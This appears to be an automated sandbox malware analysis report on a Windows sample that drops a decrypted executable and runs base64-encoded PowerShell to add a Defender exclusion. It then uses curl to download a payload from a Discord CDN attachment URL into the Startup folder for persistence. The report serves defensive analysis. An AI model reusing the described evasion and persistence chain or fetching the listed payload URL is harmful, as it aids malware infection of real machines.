Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
Command and Scripting Interpreter
1
Scripting
11
Process Injection
1
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API
12
Registry Run Keys / Startup Folder
12
Registry Run Keys / Startup Folder
1
Disable or Modify Tools
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell
1
DLL Side-Loading
1
DLL Side-Loading
21
Virtualization/Sandbox Evasion
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
Obfuscated Files or Information
LSA Secrets2
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Software Packing
Cached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1555565 Sample: file.exe Startdate: 14/11/2024 Architecture: WINDOWS Score: 76 42 cdn.discordapp.com 2->42 48 AI detected suspicious sample 2->48 50 Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet 2->50 10 file.exe 2 2->10         started        signatures3 process4 file5 38 C:\Users\user\...\decrypted_executable.exe, PE32+ 10->38 dropped 13 cmd.exe 1 10->13         started        16 conhost.exe 10->16         started        process6 signatures7 64 Suspicious powershell command line found 13->64 66 Adds a directory exclusion to Windows Defender 13->66 18 decrypted_executable.exe 8 13->18         started        process8 file9 36 C:\Users\user\AppData\Local\Temp\...D35.bat, ASCII 18->36 dropped 52 Multi AV Scanner detection for dropped file 18->52 54 Machine Learning detection for dropped file 18->54 22 cmd.exe 1 18->22         started        signatures10 process11 signatures12 56 Suspicious powershell command line found 22->56 58 Adds a directory exclusion to Windows Defender 22->58 25 curl.exe 2 22->25         started        30 powershell.exe 23 22->30         started        32 DataStore1.exe 1 22->32         started        34 conhost.exe 22->34         started        process13 dnsIp14 44 cdn.discordapp.com 162.159.135.233 CLOUDFLARENETUS United States 25->44 46 127.0.0.1 unknown unknown 25->46 40 C:\Users\user\AppData\...\DataStore1.exe, PE32+ 25->40 dropped 60 Drops PE files to the startup folder 25->60 62 Loading BitLocker PowerShell Module 30->62 file15 signatures16

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
file.exe0%ReversingLabs
file.exe0%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\decrypted_executable.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\decrypted_executable.exe38%ReversingLabsWin64.Packed.Generic
C:\Users\user\AppData\Local\Temp\decrypted_executable.exe36%VirustotalBrowse
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe1%VirustotalBrowse
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://tc39.es/proposal-iterator-helpers/#sec-iteratorprototype.some0%Avira URL Cloudsafe
https://cdn.discordapp.co0%Avira URL Cloudsafe
https://cdn.discordapp.co2%VirustotalBrowse
https://tc39.es/proposal-iterator-helpers/#sec-iteratorprototype.some0%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
cdn.discordapp.com
162.159.135.233
truefalse
    high
    NameSourceMaliciousAntivirus DetectionReputation
    https://github.com/nodejs/node/pull/36061#discussion_r533718029file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412858248.000000B2F61C1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
      high
      https://url.spec.whatwg.org/#concept-url-originfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
        high
        https://tools.ietf.org/html/rfc6455#section-1.3file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
          high
          https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesNoDashfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
            high
            https://github.com/chromium/chromium/blob/HEAD/third_party/blink/public/platform/web_crypto_algorithfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
              high
              https://www.ecma-international.org/ecma-262/8.0/#sec-atomescapefile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                high
                https://www.ecma-international.org/ecma-262/8.0/#prod-Atomfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                  high
                  https://gist.github.com/XVilka/8346728#gistcomment-2823421file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                    high
                    https://github.com/nodejs/node-v0.x-archive/issues/2876.DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                      high
                      https://cdn.discordapp.codecrypted_executable.exefalse
                      • 2%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.ecma-international.org/ecma-262/#sec-timeclipfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412976136.000001AB73981000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                        high
                        https://bugs.chromium.org/p/v8/issues/detail?id=10704DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                          high
                          https://console.spec.whatwg.org/#tablefile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                            high
                            https://www.iana.org/assignments/tls-extensiontype-valuesfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                              high
                              https://github.com/nodejs/node/issues/35475file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                high
                                https://nodejs.org/download/release/v16.16.0/node-v16.16.0.tar.gzfile.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                  high
                                  https://github.com/chalk/ansi-regex/blob/HEAD/index.jsfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412639214.0000019143401000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                    high
                                    https://console.spec.whatwg.org/#console-namespaceDataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                      high
                                      https://nodejs.org/api/fs.html#fs_stat_time_values)file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                        high
                                        https://url.spec.whatwg.org/#urlfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                          high
                                          https://encoding.spec.whatwg.org/#textencoderfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                            high
                                            https://github.com/nodejs/node/issues/13435file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                              high
                                              https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomNoDashfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                high
                                                https://github.com/tc39/proposal-weakrefsfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                  high
                                                  https://goo.gl/t5IS6M).file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412858248.000000B2F61C1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                    high
                                                    https://tools.ietf.org/html/rfc7230#section-3.2.2file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                      high
                                                      https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                        high
                                                        https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                          high
                                                          https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Assertionfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                            high
                                                            https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.jsfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                              high
                                                              https://tc39.github.io/ecma262/#sec-%iteratorprototype%-objectfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                high
                                                                https://url.spec.whatwg.org/#concept-urlencoded-serializerfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                  high
                                                                  https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3Ffile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                    high
                                                                    https://nodejs.org/api/fs.htmlfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412976136.000001AB73981000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                      high
                                                                      https://github.com/nodejs/node/pull/21313file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                        high
                                                                        https://www.ecma-international.org/ecma-262/8.0/#prod-ClassRangesfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                          high
                                                                          https://github.com/mysticatea/abort-controllerfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                            high
                                                                            https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                              high
                                                                              http://www.midnight-commander.org/browser/lib/tty/key.cfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                high
                                                                                https://nodejs.org/file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                  high
                                                                                  https://tools.ietf.org/html/rfc7540#section-8.1.2.5file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                    high
                                                                                    https://www.ecma-international.org/ecma-262/8.0/#prod-ControlEscapefile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                      high
                                                                                      https://www.ecma-international.org/ecma-262/8.0/#prod-Hex4Digitsfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                        high
                                                                                        http://www.squid-cache.org/Doc/config/half_closed_clients/file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                          high
                                                                                          https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalEscapefile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                            high
                                                                                            https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassControlLetterfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                              high
                                                                                              https://stackoverflow.com/a/5501711/3561file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                high
                                                                                                https://github.com/vercel/pkg/issues/1589file.exe, 00000000.00000003.2242705886.000000FC06341000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2413821370.0000007B5E641000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2242359003.0000017759771000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://github.com/nodejs/node/pull/33661DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                    high
                                                                                                    https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClassEscapefile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                      high
                                                                                                      http://narwhaljs.org)file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                        high
                                                                                                        https://github.com/WICG/scheduling-apisfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                          high
                                                                                                          https://tc39.es/proposal-iterator-helpers/#sec-iteratorprototype.somefile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412858248.000000B2F61C1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                          • 0%, Virustotal, Browse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://www.ecma-international.org/ecma-262/#sec-promise.allfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                            high
                                                                                                            https://cdn.discordapp.com/attachments/1167169926193229925/1306213355966435360/decrypter.exe?ex=6735curl.exe, 00000008.00000002.2382452947.0000027ACC874000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://code.google.com/p/chromium/issues/detail?id=25916file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2413111118.000001EBEEA01000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                high
                                                                                                                https://github.com/tc39/proposal-iterator-helpers/issues/169file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412858248.000000B2F61C1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                  high
